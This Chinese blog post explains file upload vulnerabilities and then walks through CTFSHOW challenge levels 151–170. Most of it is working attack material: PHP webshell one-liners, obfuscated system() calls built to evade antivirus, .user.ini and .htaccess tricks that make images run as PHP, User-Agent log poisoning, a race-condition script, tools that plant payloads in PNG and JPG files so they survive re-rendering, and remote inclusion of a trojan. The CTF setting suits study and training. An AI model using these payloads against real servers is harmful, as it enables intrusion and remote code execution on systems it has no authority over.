跳到主要内容
极客日志极客日志面向AI+效率的开发者社区
首页博客GitHub 精选镜像AI 生图工具UI配色美学隐私政策关于联系
搜索内容 / 工具 / 仓库 / 镜像...⌘K搜索
注册
博客列表
PHP

文件上传漏洞详解与绕过技巧

文件上传漏洞指用户上传可执行脚本并获取服务器命令执行能力。常见危害包括代码执行、木马植入及钓鱼欺诈。利用条件需满足脚本解析权限及目录可执行性。检测流程涵盖客户端 JS、服务端 MIME、路径、后缀及内容检测。绕过技巧涉及前端验证修改、后端 Content-Type 伪造、user.ini 配置覆盖、日志包含、条件竞争、二次渲染及.htaccess 解析等。通过 CTFSHOW 实战演练展示了多种过滤绕过方法,如关键字替换、免杀构造及特殊字符利用。

指针猎手发布于 2025/2/7更新于 2026/7/2748 浏览
文件上传漏洞详解与绕过技巧
文件上传漏洞介绍

文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。'文件上传'本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。

这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。

文件上传漏洞危害
  1. 上传文件是 web 脚本语言,服务器的 web 容器解释并执行了用户上传的脚本,导致代码执行。
  2. 上传文件是病毒或者木马时,主要用于诱骗用户或者管理员下载执行或者直接自动运行;
  3. 上传文件是 Flash 的策略文件 crossdomain.xml,黑客用以控制 Flash 在该域下的行为 (其他通过类似方式控制策略文件的情况类似);
  4. 上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行;
  5. 上传文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。除此之外,还有一些不常见的利用方法,比如将上传文件作为一个入口,溢出服务器的后台处理程序,如图片解析模块;或者上传一个合法的文本文件,其内容包含了 PHP 脚本,再通过'本地文件包含漏洞 (Local File Include)'执行此脚本。
文件上传漏洞满足条件

上传的后门文件,需要能被脚本语言解析执行。

  • 说明一:对方服务器运行的 PHP 环境,你不能上传一个 JAVA 的后门代码。
  • 说明二:你上传文件的目录可以被脚本语言解析执行,如果你上传的目录没有执行权限也不行
  • 说明三:一般文件上传后会返回你一个地址,如果无法链接到也不能构成文件上传漏洞。

还有例外情况,非脚本文件也能被成功解析。比如:上传了一个图片马,如果对方中间件上存在一些漏洞的话,配合这些漏洞可以实现图片文件按照脚本文件解析。

文件检测流程

通常一个文件以 HTTP 协议进行上传时,将以 POST 请求发送至 web 服务器,web 服务器接收到请求后并同意后,用户与 web 服务器将建立连接,并传输 data:

文件上传流程图

而一般一个文件上传过程中的检测如下图红色标记部分:

文件上传检测流程

检测的内容一般有以下几个方面:

  1. 客户端 javascript 检测 (通常为检测文件扩展名)
  2. 服务端 MIME 类型检测 (检测 Content-Type 内容)
  3. 服务端目录路径检测 (检测跟 path 参数相关的内容)
  4. 服务端文件扩展名检测 (检测跟文件 extension 相关的内容)
  5. 服务端文件内容检测 (检测内容是否合法或含有恶意代码)
CTFSHOW 151 关 -170 关
151 关:前端验证绕过

前端代码,限制只允许上传图片。

前端验证界面

修改 png 为 php 即可绕过前端校验。

修改后缀

最后会返回一个地址,使用蚁剑链接

蚁剑连接

读取 flag

152 关:后端校验 Content-Type 校验文件格式

前端修改,抓取上传数据包,并且修改 Content-Type

修改包

上传成功

上传成功

后门链接读取 flag

153 关:filename 字段文件后缀校验

按照刚刚提到的文件上传成因来说,如果加入了 php 后缀校验的话,路就被封死了。但还有另外一条路,就是非 php 文件后缀解析按照 php 进行解析。

文件后缀校验解决思路:引入 user.ini 文件

根据网上查到的信息,user.ini 文件中有个字段 auto_prepend_file 它可以把指定文件文件加载到网站的首页,是根目录的首页。

我们可以得到的信息:通过这个字段可以把文件与你上传的目录首页文件一起加载,被 php 脚本执行解析。

由此我们得出结论,user.ini 文件使用的限制条件:

  1. 上传.user.ini 的目录必须有设置默认首页
  2. php 版本必须要在 5 以上

使用 user.ini 文件的好处:

  1. 可以突破文件后缀的检测
  2. 可以突破图片目录不给解析执行权限的限制

详细利用手法如下:

上传 user.ini 文件

上传 user.ini

上传后门图片文件

上传后门

后门链接读取 flag

读取 flag

154 关:关键字过滤

手法和 153 关一样,不同点在于增加了对图片内容的检测,检测图片的数据里有没有恶意的代码。经过尝试发现,过滤了 php。

绕过方法:

<% echo '123';%> //前提是开启配置参数 asp_tags=on

构造 payload:<?=eval($_POST[x]);?>    

再次上传后门文件,读取 flag 即可

155 关:关键字过滤

和上一关一模一样,不再赘述。

156 关:过滤关键字

和第 153 关手法一样,结合上传 .user.ini 但是过滤的内容变了

经过尝试过滤的内容发现是 [] 绕过的手法可以参考第 154 关列举出来的方法

解决思路:[] == {}

构造 payload:<?=eval($_POST{x});?>

链接后门读取 flag 即可

157 关:过滤关键字

和第 153 关手法一样,结合上传 .user.ini 但是过滤的内容变了

经过尝试发现过滤的 ; 与 [] ,分号一旦被过滤就意味着 154 关的四种过滤手法失效

解决思路:直接调用系统的命令

构造 payload:<?=system('tac ../flag.*')?>

直接访问 upload 命令就能看到结果

158 关:过滤关键字

和 157 关一模一样

159 关:过滤关键字

和第 153 关手法一样,结合上传 .user.ini 但是过滤的内容变了

在上一关过滤的基础上,加入了对 () 的过滤,同时还过来了 flag.php

解决思路:使用反引号,结合通配符

构造 payload:<?=`tac ../fl*`?>
160 关:日志文件包含

这一关连反引号都过滤了,1.png 里面包含后门的全部失效。

Nginx 一般会记录日志,日志会记录访问者的 UA 头,所以我们可以把后门代码写到 UA 头里面,然后利用 .user.ini 来包含日志文件,Nginx 默认日志位置 /var/log/nginx

首先上传文件.user.ini,在上传图片

图片中的内容

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

这时访问 upload 目录,得到了 nginx 日志信息

日志信息

此时我们可以在 UA 头中写入后门代码。将日志文件包含解析,我们将 UA 写入日志文件,进而解析后门代码

UA 注入

161 关:文件头检测

加上了对文件头的检测,GIF89A,

解决思路:在上传的文件中加入,GIF89A,再延续 160 关的思路即可

162 关:过滤 .

这一关不仅是检测了文件头,也过滤了 ()、[]、{}、.这些,所以我们可以将 .user.ini 的内容写为

GIF89a
auto_prepend_file=png

user.ini 内容

我们可以远程包含文件,然后这个文件里面有一句话木马,这边需要用到 IP 转换地址,将 IP 转换为纯数字 网址:

GIF89a
<?=include'http://IP 转换/文件名'>

远程包含

读取 flag

163 关:条件竞争

参考文章:

如果网站的文件上传的过程是:服务器获取文件–>保存上传临时文件–>重命名移动临时文件 这样的步骤时,就可以通过不断地对文件进行上传和访问,从而使服务器还未重命名移动临时文件时,我们就利用时间差打开了文件,成功执行其中的恶意代码。

再 php.ini 中有以下几个选项目:

1. session.upload_progress.enabled = on
2. session.upload_progress.cleanup = on
3. session.upload_progress.prefix = "upload_progress_"
4. session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
5. session.use_strict_mode=off

这五个开启后,可以达到我们可以控制 sessionid 这个参数,并且可以创建 session 文件,我们就可以把恶意代码写入 session 文件中,在它被删除之前,通过不断发包访问来使 session 文件被包含。

import requests
import threading
session=requests.session()
sess='yu22x'
url1="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/"
url2="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/upload"
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php system("tac ../f*");?>'
}
file={
	'file':'toxicant'
}
cookies={
	'PHPSESSID': sess
}

def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.get(url2)
		if 'flag' in r.text:
			print(r.text)
			
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

因为 session 文件名字,前半部分固定,后半部分是 sessionid,这部分我们是可以控制的。开启两个线程,一个不断上传文件,另外一个不断访问触发,如果 session 文件成功被包含后,那么我们就可以访问成功,执行读取 flag.php 的代码,得到 flag。

先上传.user.in 文件

GIF89a
auto_prepend_file=png

再上传 png,条件竞争的利用,还需要满足条件,知道对方 session 文件的目录。

GIF89a
<?=include"/tmp/sess_toxicant"?>

我这里的利用代码一直没跑出来结果,所以就暂且先放放。

164 关:二次渲染

文件二次渲染:当你上传一个图片后,服务器会对图片进行处理,你的后门也就很可能被处理了

解决思路:使用脚本,有人分析了图片处理的规律,使用脚本可以把后门代码写入图片而不被处理

可以利用工具来将木马插入到图片中,工具代码如下,将代码放置到 PHP 环境中执行即可

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);

$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round(y / 3), 0, $color);
}
imagepng($img,'2.png');  //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
 */
?>

上传成功之后访问图片地址,在后面加入&0=system,1=tac flag.php,这个 1=需要用 POST 方式提交

关于为什么这个图片能被 php 解析?

查看 download.php 的源代码

源码分析

我们想要查看的图片被包含进入了 download.php 文件

165 关:二次渲染

和上一关一个套路,只不过这次是 jpg

<?php
    $miniPayload = "<?=eval(\$_POST[1]);?>";

    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }
    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }
    set_error_handler("custom_error_handler");
    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }
        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something's wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>
166 关:上传 zip 格式

直接上传一个 shell.php,内容为后门文件,链接即可。

zip 上传

这里也是对这个 zip 文件进行了文件包含,导致这个 zip 文件可以被加载。

167 关:.htaccess 文件绕过

.htaccess 默认不支持 nginx,设置后支持,默认支持 Apache,.htaccess 可以通过设置实现 nginx 文件解析配置,将.png 后缀的文件解析成 php。

首先先上传 .htaccess 文件

AddType application/x-httpd-php .jpg //htaccess 文件内容

上传 htaccess

上传含有后门的图片

上传后门

链接后门读取 flag

读取 flag

168 关:考验免杀

这个可以直接上传 php 文件,我们对 payload 进行处理,使其可以不被杀死

payload1:
<?php $a='syste';$b='m';$c=$a.$b;$c('tac ../flagaa.php');?>

payload2:
<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

payload3:
<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

payload4:
<?php
$a=strrev('metsys');
$a($_REQUEST[1]);
?>

上传后门文件

上传后门

文件上传成功,链接后门读取 flag

http://3af2a636-8362-4c0b-9147-de822c7ddc9d.challenge.ctf.show/upload/test.php?1=cat ../flagaa.php

读取 flag

169 关:日志包含

这一关上传了.user.ini 之后,访问 upload 目录显示 403,所以我们需要上传一个 index.php,构造.user.ini 利用条件:上传 index.php 内容随意。上传.user.ini 包含日志:auto_prepend_file=/var/log/nginx/access.log
访问地址带后门 UA 头写入日志:<?=eval($_POST[x]);?>

这里其实和 160 的文件包含是一样的。只是我们需要上传 index.php 配合.user.ini

爆出 403 的错误就以为着当前目录的目录文件缺失。

170 关:和 169 一模一样

目录

  1. 文件上传漏洞介绍
  2. 文件上传漏洞危害
  3. 文件上传漏洞满足条件
  4. 文件检测流程
  5. CTFSHOW 151 关 -170 关
  6. 151 关:前端验证绕过
  7. 152 关:后端校验 Content-Type 校验文件格式
  8. 153 关:filename 字段文件后缀校验
  9. 154 关:关键字过滤
  10. 155 关:关键字过滤
  11. 156 关:过滤关键字
  12. 157 关:过滤关键字
  13. 158 关:过滤关键字
  14. 159 关:过滤关键字
  15. 160 关:日志文件包含
  16. 161 关:文件头检测
  17. 162 关:过滤 .
  18. 163 关:条件竞争
  19. 164 关:二次渲染
  20. 165 关:二次渲染
  21. 166 关:上传 zip 格式
  22. 167 关:.htaccess 文件绕过
  23. 168 关:考验免杀
  24. 169 关:日志包含
  25. 170 关:和 169 一模一样
  • 免费图片AI生成工具免费生成了解详情
  • Magick API 一键接入全球大模型注册送1000万token查看
  • 免费图片视频在线生成30秒,将你的创意变成现实开始设计
  • X/Twitter免费视频下载器免登陆无限额度免费视频解析下载了解详情
  • 100+免费在线小游戏爽一把
极客日志微信公众号二维码

微信扫一扫,关注极客日志

微信公众号「极客日志V2」,在微信中扫描左侧二维码关注。展示文案:极客日志V2 zeeklog

更多推荐文章

查看全部
  • VS Code Copilot 实战指南:从安装到高级配置
  • Spring AI Alibaba 集成 Redis 向量数据库实现 RAG 与记忆功能
  • Android 工程师职业发展:转行抉择与深耕策略
  • Midjourney 官网地址与语言支持说明
  • 小智 ESP32 开源 AI 语音交互系统构建指南
  • 9 款主流 Python 编辑器与 IDE 深度解析及选型指南
  • 前端权限管理实战:如何优雅地控制用户视图
  • AutoFigure:从长文本自动生成高质量科研插图
  • Redis 五大核心数据结构及底层原理详解
  • Android 插件化开发:代理 Activity 模式详解
  • 使用 Claude 与 Android Studio 快速构建 WebView 项目模板
  • AI 提示词设计中的语义歧义与陷阱
  • 飞书 OpenClaw 机器人 HTTP 401 认证失败排查与解决方案
  • 大模型工程师学习路线:从基础到上手
  • 2026 焊接机器人十大品牌推荐
  • Git 推送与拉取:本地与远程代码同步实战指南
  • Web Components 实战:从原生 API 到跨框架复用
  • NanoClaw 深度剖析:AI 原生个人助手的架构设计
  • Stable Diffusion WebUI 核心文件夹结构与模型实战指南
  • Python 异步编程与协程实战指南

相关免费在线工具

  • curl 转代码

    解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online

  • Base64 字符串编码/解码

    将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online

  • Base64 文件转换器

    将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online

  • Markdown转HTML

    将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online

  • HTML转Markdown

    将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online

  • JSON 压缩

    通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online